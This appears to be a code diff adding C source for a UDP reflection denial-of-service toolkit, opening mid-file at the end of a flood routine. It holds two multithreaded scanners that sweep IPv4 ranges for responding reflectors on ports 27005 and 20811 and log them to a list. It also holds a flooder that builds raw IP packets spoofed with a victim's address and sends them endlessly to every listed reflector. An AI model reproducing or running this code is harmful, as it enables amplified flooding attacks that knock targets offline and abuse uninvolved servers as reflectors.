usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,306 @@
|
|||
#include <pcap.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h> // for exit()
|
||||
#include <string.h> //for memset
|
||||
#include <sys/ioctl.h>
|
||||
#include <net/if.h>
|
||||
#include <sys/socket.h>
|
||||
#include <arpa/inet.h> // for inet_ntoa()
|
||||
#include <net/ethernet.h>
|
||||
#include <netinet/udp.h> //Provides declarations for udp header
|
||||
#include <netinet/ip.h> //Provides declarations for ip header
|
||||
#include <pthread.h>
|
||||
#include <semaphore.h>
|
||||
#include <signal.h>
|
||||
#include <sys/resource.h>
|
||||
#include <unistd.h>
|
||||
static unsigned int payloadsize = 1;
|
||||
static unsigned int xport = 27005;
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer);
|
||||
|
||||
struct buffer
|
||||
{
|
||||
void *data;
|
||||
int size;
|
||||
struct buffer *next;
|
||||
struct buffer *prev;
|
||||
};
|
||||
struct buffer *head;
|
||||
|
||||
char *ipv4;
|
||||
int processed,over,total,i,j;
|
||||
struct sockaddr_in dest;
|
||||
pthread_mutex_t buf_mutex = PTHREAD_MUTEX_INITIALIZER;
|
||||
sem_t loop_sem;
|
||||
int running_threads = 0;
|
||||
volatile int found_srvs = 0;
|
||||
volatile unsigned long per_thread = 0;
|
||||
volatile unsigned long start = 0;
|
||||
volatile unsigned long scanned = 0;
|
||||
int sleep_between = 0;
|
||||
volatile int bytes_sent = 0;
|
||||
volatile unsigned long hosts_done = 0;
|
||||
FILE *fd;
|
||||
|
||||
void *readthread()
|
||||
{
|
||||
struct buffer *ourhead = head;
|
||||
struct sockaddr_in saddr;
|
||||
while(1)
|
||||
{
|
||||
sem_wait(&loop_sem);
|
||||
while(ourhead->data == NULL){ ourhead = ourhead->next; }
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *buf = malloc(ourhead->size);
|
||||
int size = ourhead->size;
|
||||
memcpy(buf, ourhead->data, ourhead->size);
|
||||
free(ourhead->data);
|
||||
ourhead->data = NULL;
|
||||
ourhead->size = 0;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
memset(&saddr, 0, sizeof(saddr));
|
||||
struct iphdr *iph = (struct iphdr*)(buf + sizeof(struct ethhdr));
|
||||
saddr.sin_addr.s_addr = iph->saddr;
|
||||
struct udphdr *udph = (struct udphdr *)(buf + sizeof(struct ethhdr) + sizeof(struct iphdr));
|
||||
if(ntohs(udph->source) == xport)
|
||||
{
|
||||
int body_length = size - sizeof(struct ethhdr) - sizeof(struct iphdr) - sizeof(struct udphdr);
|
||||
fprintf(fd,"%s %d\n",inet_ntoa(saddr.sin_addr),body_length);
|
||||
fflush(fd);
|
||||
found_srvs++;
|
||||
}
|
||||
free(buf);
|
||||
processed++;
|
||||
ourhead = ourhead->next;
|
||||
}
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
running_threads++;
|
||||
int thread_id = (int)par1;
|
||||
unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
|
||||
unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
|
||||
unsigned long w;
|
||||
int y;
|
||||
unsigned char buf[65536];
|
||||
memcpy(buf, "\x00", payloadsize);
|
||||
int sizeofpayload = payloadsize;
|
||||
int sock;
|
||||
if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
|
||||
perror("cant open socket");
|
||||
exit(-1);
|
||||
}
|
||||
for(w=ntohl(start_ip);w<htonl(end);w++)
|
||||
{
|
||||
struct sockaddr_in servaddr;
|
||||
bzero(&servaddr, sizeof(servaddr));
|
||||
servaddr.sin_family = AF_INET;
|
||||
servaddr.sin_addr.s_addr=htonl(w);
|
||||
servaddr.sin_port=htons(xport);
|
||||
sendto(sock,(char *)buf,sizeofpayload,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
|
||||
bytes_sent+=sizeofpayload;
|
||||
scanned++;
|
||||
hosts_done++;
|
||||
usleep(sleep_between*1000);
|
||||
}
|
||||
close(sock);
|
||||
running_threads--;
|
||||
return;
|
||||
}
|
||||
|
||||
void sighandler(int sig)
|
||||
{
|
||||
fclose(fd);
|
||||
printf("\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void *printthread(void *argvs)
|
||||
{
|
||||
char **argv = (char **)argvs;
|
||||
int threads = atoi(argv[4]);
|
||||
pthread_t thread;
|
||||
sleep(1);
|
||||
char *str_start = malloc(18);
|
||||
memset(str_start, 0, 18);
|
||||
str_start = argv[1];
|
||||
char *str_end = malloc(18);
|
||||
memset(str_end, 0, 18);
|
||||
str_end = argv[2];
|
||||
start = inet_addr(str_start);
|
||||
per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
|
||||
unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
|
||||
int i;
|
||||
for(i = 0;i<threads;i++){
|
||||
pthread_create( &thread, NULL, &flood, (void *) i);
|
||||
}
|
||||
char *temp = (char *)malloc(17);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Reflectors");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "IP/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Bytes/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Threads");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "%");
|
||||
printf("%s", temp);
|
||||
printf("\n");
|
||||
|
||||
char *new;
|
||||
new = (char *)malloc(16*6);
|
||||
while (running_threads > 0)
|
||||
{
|
||||
printf("\r");
|
||||
memset(new, '\0', 16*6);
|
||||
sprintf(new, "%s|%-15lu", new, found_srvs);
|
||||
sprintf(new, "%s|%-15d", new, scanned);
|
||||
sprintf(new, "%s|%-15d", new, bytes_sent);
|
||||
sprintf(new, "%s|%-15d", new, running_threads);
|
||||
memset(temp, 0, 17);
|
||||
int percent_done=((double)(hosts_done)/(double)(toscan))*100;
|
||||
sprintf(temp, "%d%%", percent_done);
|
||||
sprintf(new, "%s|%s", new, temp);
|
||||
printf("%s", new);
|
||||
fflush(stdout);
|
||||
bytes_sent=0;
|
||||
scanned = 0;
|
||||
sleep(1);
|
||||
}
|
||||
printf("\n");
|
||||
fclose(fd);
|
||||
exit(0);
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[ ])
|
||||
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "The right fucking way: %s <1.0.0.0> <255.255.255.255> <list> <threads> <delay>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fd = fopen(argv[3], "a");
|
||||
sleep_between = atoi(argv[5]);
|
||||
int num_threads = atoi(argv[4]);
|
||||
|
||||
const rlim_t kOpenFD = 1024 + (num_threads * 2);
|
||||
struct rlimit rl;
|
||||
int result;
|
||||
rl.rlim_cur = kOpenFD;
|
||||
rl.rlim_max = kOpenFD;
|
||||
result = setrlimit(RLIMIT_NOFILE, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_nofile");
|
||||
fprintf(stderr, "setrlimit_nofile returned result = %d\n", result);
|
||||
}
|
||||
bzero(&rl, sizeof(struct rlimit));
|
||||
rl.rlim_cur = 256 * 1024;
|
||||
rl.rlim_max = 4096 * 1024;
|
||||
result = setrlimit(RLIMIT_STACK, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_stack");
|
||||
fprintf(stderr, "setrlimit_stack returned result = %d\n", result);
|
||||
}
|
||||
|
||||
signal(SIGINT, &sighandler);
|
||||
|
||||
pcap_if_t *alldevsp;
|
||||
pcap_t *handle; //Handle of the device that shall be sniffed
|
||||
|
||||
char errbuf[100] , *devname , devs[100][100];
|
||||
int count = 1 , n;
|
||||
|
||||
if( pcap_findalldevs( &alldevsp , errbuf) )
|
||||
{
|
||||
exit(1);
|
||||
}
|
||||
|
||||
devname = alldevsp->name;
|
||||
ipv4 = malloc(16);
|
||||
bzero(ipv4, 16);
|
||||
struct ifreq ifc;
|
||||
int res;
|
||||
int sockfd = socket(AF_INET, SOCK_DGRAM, 0);
|
||||
|
||||
if(sockfd < 0) exit(-1);
|
||||
strcpy(ifc.ifr_name, devname);
|
||||
res = ioctl(sockfd, SIOCGIFADDR, &ifc);
|
||||
close(sockfd);
|
||||
if(res < 0) exit(-1);
|
||||
strcpy(ipv4, inet_ntoa(((struct sockaddr_in*)&ifc.ifr_addr)->sin_addr));
|
||||
printf("Opening device %s for sniffing ... " , devname);
|
||||
handle = pcap_open_live(devname , 65536 , 1 , 0 , errbuf);
|
||||
|
||||
if (handle == NULL)
|
||||
{
|
||||
fprintf(stderr, "Couldn't open device %s : %s\n" , devname , errbuf);
|
||||
exit(1);
|
||||
}
|
||||
printf("Done\n");
|
||||
|
||||
sem_init(&loop_sem, 0, -1);
|
||||
i = 1024*1000;
|
||||
while(i--)
|
||||
{
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(head, sizeof(struct buffer));
|
||||
head->data = NULL;
|
||||
head->size = 0;
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct buffer *new_node = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(new_node, sizeof(struct buffer));
|
||||
new_node->data = NULL;
|
||||
new_node->size = 0;
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
}
|
||||
|
||||
pthread_t prnthread;
|
||||
pthread_create( &prnthread, NULL, &printthread, (void *)argv);
|
||||
pthread_t redthread;
|
||||
pthread_create( &redthread, NULL, &readthread, NULL);
|
||||
|
||||
pcap_loop(handle , -1 , process_packet , NULL);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer)
|
||||
{
|
||||
int size = header->len;
|
||||
|
||||
//Get the IP Header part of this packet , excluding the ethernet header
|
||||
struct iphdr *iph = (struct iphdr*)(buffer + sizeof(struct ethhdr));
|
||||
memset(&dest, 0, sizeof(dest));
|
||||
dest.sin_addr.s_addr = iph->daddr;
|
||||
|
||||
if(iph->protocol == 17 && strcmp(inet_ntoa(dest.sin_addr), ipv4) == 0)
|
||||
{
|
||||
//toss into buffer
|
||||
if(head->data != NULL) over++;
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *temp = malloc(size);
|
||||
memcpy(temp, buffer, size);
|
||||
head->data = temp;
|
||||
head->size = size;
|
||||
head = head->next;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
sem_post(&loop_sem);
|
||||
total++;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,211 @@
|
|||
/*
|
||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
||||
*/
|
||||
#include <time.h>
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 8192
|
||||
#define PHI 0x9e3779b9
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
volatile int tehport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++)
|
||||
{
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
}
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum = 0;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 1;
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_UDP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
void setup_udp_header(struct udphdr *udph)
|
||||
{
|
||||
udph->source = htons(5678);
|
||||
udph->dest = htons(20811);
|
||||
udph->check = 0;
|
||||
memcpy((void *)udph + sizeof(struct udphdr), "0x01", 1);
|
||||
udph->len=htons(sizeof(struct udphdr) + 1);
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_udp_header(udph);
|
||||
udph->source = htons(rand() % 65535 - 1026);
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
list_node = list_node->next;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
srand(time(NULL));
|
||||
int i = 0;
|
||||
head = NULL;
|
||||
fprintf(stdout, "Setting up sockets...\n");
|
||||
int max_len = 128;
|
||||
char *buffer = (char *) malloc(max_len);
|
||||
buffer = memset(buffer, 0x00, max_len);
|
||||
int num_threads = atoi(argv[4]);
|
||||
int maxpps = atoi(argv[5]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
int multiplier = 20;
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
||||
buffer[strlen(buffer) - 1] = 0x00;
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(&head->data, sizeof(head->data));
|
||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
memset(new_node, 0x00, sizeof(struct list));
|
||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
i++;
|
||||
} else {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
struct list *current = head->next;
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
for(i = 0;i<num_threads;i++){
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = current;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
}
|
||||
fprintf(stdout, "Starting flood...\n");
|
||||
for(i = 0;i<(atoi(argv[6])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,306 @@
|
|||
#include <pcap.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h> // for exit()
|
||||
#include <string.h> //for memset
|
||||
#include <sys/ioctl.h>
|
||||
#include <net/if.h>
|
||||
#include <sys/socket.h>
|
||||
#include <arpa/inet.h> // for inet_ntoa()
|
||||
#include <net/ethernet.h>
|
||||
#include <netinet/udp.h> //Provides declarations for udp header
|
||||
#include <netinet/ip.h> //Provides declarations for ip header
|
||||
#include <pthread.h>
|
||||
#include <semaphore.h>
|
||||
#include <signal.h>
|
||||
#include <sys/resource.h>
|
||||
#include <unistd.h>
|
||||
static unsigned int payloadsize = 1;
|
||||
static unsigned int xport = 20811;
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer);
|
||||
|
||||
struct buffer
|
||||
{
|
||||
void *data;
|
||||
int size;
|
||||
struct buffer *next;
|
||||
struct buffer *prev;
|
||||
};
|
||||
struct buffer *head;
|
||||
|
||||
char *ipv4;
|
||||
int processed,over,total,i,j;
|
||||
struct sockaddr_in dest;
|
||||
pthread_mutex_t buf_mutex = PTHREAD_MUTEX_INITIALIZER;
|
||||
sem_t loop_sem;
|
||||
int running_threads = 0;
|
||||
volatile int found_srvs = 0;
|
||||
volatile unsigned long per_thread = 0;
|
||||
volatile unsigned long start = 0;
|
||||
volatile unsigned long scanned = 0;
|
||||
int sleep_between = 0;
|
||||
volatile int bytes_sent = 0;
|
||||
volatile unsigned long hosts_done = 0;
|
||||
FILE *fd;
|
||||
|
||||
void *readthread()
|
||||
{
|
||||
struct buffer *ourhead = head;
|
||||
struct sockaddr_in saddr;
|
||||
while(1)
|
||||
{
|
||||
sem_wait(&loop_sem);
|
||||
while(ourhead->data == NULL){ ourhead = ourhead->next; }
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *buf = malloc(ourhead->size);
|
||||
int size = ourhead->size;
|
||||
memcpy(buf, ourhead->data, ourhead->size);
|
||||
free(ourhead->data);
|
||||
ourhead->data = NULL;
|
||||
ourhead->size = 0;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
memset(&saddr, 0, sizeof(saddr));
|
||||
struct iphdr *iph = (struct iphdr*)(buf + sizeof(struct ethhdr));
|
||||
saddr.sin_addr.s_addr = iph->saddr;
|
||||
struct udphdr *udph = (struct udphdr *)(buf + sizeof(struct ethhdr) + sizeof(struct iphdr));
|
||||
if(ntohs(udph->source) == xport)
|
||||
{
|
||||
int body_length = size - sizeof(struct ethhdr) - sizeof(struct iphdr) - sizeof(struct udphdr);
|
||||
fprintf(fd,"%s %d\n",inet_ntoa(saddr.sin_addr),body_length);
|
||||
fflush(fd);
|
||||
found_srvs++;
|
||||
}
|
||||
free(buf);
|
||||
processed++;
|
||||
ourhead = ourhead->next;
|
||||
}
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
running_threads++;
|
||||
int thread_id = (int)par1;
|
||||
unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
|
||||
unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
|
||||
unsigned long w;
|
||||
int y;
|
||||
unsigned char buf[65536];
|
||||
memcpy(buf, "\x00", payloadsize);
|
||||
int sizeofpayload = payloadsize;
|
||||
int sock;
|
||||
if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
|
||||
perror("cant open socket");
|
||||
exit(-1);
|
||||
}
|
||||
for(w=ntohl(start_ip);w<htonl(end);w++)
|
||||
{
|
||||
struct sockaddr_in servaddr;
|
||||
bzero(&servaddr, sizeof(servaddr));
|
||||
servaddr.sin_family = AF_INET;
|
||||
servaddr.sin_addr.s_addr=htonl(w);
|
||||
servaddr.sin_port=htons(xport);
|
||||
sendto(sock,(char *)buf,sizeofpayload,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
|
||||
bytes_sent+=sizeofpayload;
|
||||
scanned++;
|
||||
hosts_done++;
|
||||
usleep(sleep_between*1000);
|
||||
}
|
||||
close(sock);
|
||||
running_threads--;
|
||||
return;
|
||||
}
|
||||
|
||||
void sighandler(int sig)
|
||||
{
|
||||
fclose(fd);
|
||||
printf("\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void *printthread(void *argvs)
|
||||
{
|
||||
char **argv = (char **)argvs;
|
||||
int threads = atoi(argv[4]);
|
||||
pthread_t thread;
|
||||
sleep(1);
|
||||
char *str_start = malloc(18);
|
||||
memset(str_start, 0, 18);
|
||||
str_start = argv[1];
|
||||
char *str_end = malloc(18);
|
||||
memset(str_end, 0, 18);
|
||||
str_end = argv[2];
|
||||
start = inet_addr(str_start);
|
||||
per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
|
||||
unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
|
||||
int i;
|
||||
for(i = 0;i<threads;i++){
|
||||
pthread_create( &thread, NULL, &flood, (void *) i);
|
||||
}
|
||||
char *temp = (char *)malloc(17);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Reflectors");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "IP/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Bytes/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Threads");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "%");
|
||||
printf("%s", temp);
|
||||
printf("\n");
|
||||
|
||||
char *new;
|
||||
new = (char *)malloc(16*6);
|
||||
while (running_threads > 0)
|
||||
{
|
||||
printf("\r");
|
||||
memset(new, '\0', 16*6);
|
||||
sprintf(new, "%s|%-15lu", new, found_srvs);
|
||||
sprintf(new, "%s|%-15d", new, scanned);
|
||||
sprintf(new, "%s|%-15d", new, bytes_sent);
|
||||
sprintf(new, "%s|%-15d", new, running_threads);
|
||||
memset(temp, 0, 17);
|
||||
int percent_done=((double)(hosts_done)/(double)(toscan))*100;
|
||||
sprintf(temp, "%d%%", percent_done);
|
||||
sprintf(new, "%s|%s", new, temp);
|
||||
printf("%s", new);
|
||||
fflush(stdout);
|
||||
bytes_sent=0;
|
||||
scanned = 0;
|
||||
sleep(1);
|
||||
}
|
||||
printf("\n");
|
||||
fclose(fd);
|
||||
exit(0);
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[ ])
|
||||
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "The right fucking way: %s <1.0.0.0> <255.255.255.255> <list> <threads> <delay>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fd = fopen(argv[3], "a");
|
||||
sleep_between = atoi(argv[5]);
|
||||
int num_threads = atoi(argv[4]);
|
||||
|
||||
const rlim_t kOpenFD = 1024 + (num_threads * 2);
|
||||
struct rlimit rl;
|
||||
int result;
|
||||
rl.rlim_cur = kOpenFD;
|
||||
rl.rlim_max = kOpenFD;
|
||||
result = setrlimit(RLIMIT_NOFILE, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_nofile");
|
||||
fprintf(stderr, "setrlimit_nofile returned result = %d\n", result);
|
||||
}
|
||||
bzero(&rl, sizeof(struct rlimit));
|
||||
rl.rlim_cur = 256 * 1024;
|
||||
rl.rlim_max = 4096 * 1024;
|
||||
result = setrlimit(RLIMIT_STACK, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_stack");
|
||||
fprintf(stderr, "setrlimit_stack returned result = %d\n", result);
|
||||
}
|
||||
|
||||
signal(SIGINT, &sighandler);
|
||||
|
||||
pcap_if_t *alldevsp;
|
||||
pcap_t *handle; //Handle of the device that shall be sniffed
|
||||
|
||||
char errbuf[100] , *devname , devs[100][100];
|
||||
int count = 1 , n;
|
||||
|
||||
if( pcap_findalldevs( &alldevsp , errbuf) )
|
||||
{
|
||||
exit(1);
|
||||
}
|
||||
|
||||
devname = alldevsp->name;
|
||||
ipv4 = malloc(16);
|
||||
bzero(ipv4, 16);
|
||||
struct ifreq ifc;
|
||||
int res;
|
||||
int sockfd = socket(AF_INET, SOCK_DGRAM, 0);
|
||||
|
||||
if(sockfd < 0) exit(-1);
|
||||
strcpy(ifc.ifr_name, devname);
|
||||
res = ioctl(sockfd, SIOCGIFADDR, &ifc);
|
||||
close(sockfd);
|
||||
if(res < 0) exit(-1);
|
||||
strcpy(ipv4, inet_ntoa(((struct sockaddr_in*)&ifc.ifr_addr)->sin_addr));
|
||||
printf("Opening device %s for sniffing ... " , devname);
|
||||
handle = pcap_open_live(devname , 65536 , 1 , 0 , errbuf);
|
||||
|
||||
if (handle == NULL)
|
||||
{
|
||||
fprintf(stderr, "Couldn't open device %s : %s\n" , devname , errbuf);
|
||||
exit(1);
|
||||
}
|
||||
printf("Done\n");
|
||||
|
||||
sem_init(&loop_sem, 0, -1);
|
||||
i = 1024*1000;
|
||||
while(i--)
|
||||
{
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(head, sizeof(struct buffer));
|
||||
head->data = NULL;
|
||||
head->size = 0;
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct buffer *new_node = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(new_node, sizeof(struct buffer));
|
||||
new_node->data = NULL;
|
||||
new_node->size = 0;
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
}
|
||||
|
||||
pthread_t prnthread;
|
||||
pthread_create( &prnthread, NULL, &printthread, (void *)argv);
|
||||
pthread_t redthread;
|
||||
pthread_create( &redthread, NULL, &readthread, NULL);
|
||||
|
||||
pcap_loop(handle , -1 , process_packet , NULL);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer)
|
||||
{
|
||||
int size = header->len;
|
||||
|
||||
//Get the IP Header part of this packet , excluding the ethernet header
|
||||
struct iphdr *iph = (struct iphdr*)(buffer + sizeof(struct ethhdr));
|
||||
memset(&dest, 0, sizeof(dest));
|
||||
dest.sin_addr.s_addr = iph->daddr;
|
||||
|
||||
if(iph->protocol == 17 && strcmp(inet_ntoa(dest.sin_addr), ipv4) == 0)
|
||||
{
|
||||
//toss into buffer
|
||||
if(head->data != NULL) over++;
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *temp = malloc(size);
|
||||
memcpy(temp, buffer, size);
|
||||
head->data = temp;
|
||||
head->size = size;
|
||||
head = head->next;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
sem_post(&loop_sem);
|
||||
total++;
|
||||
}
|
||||
}
|
|
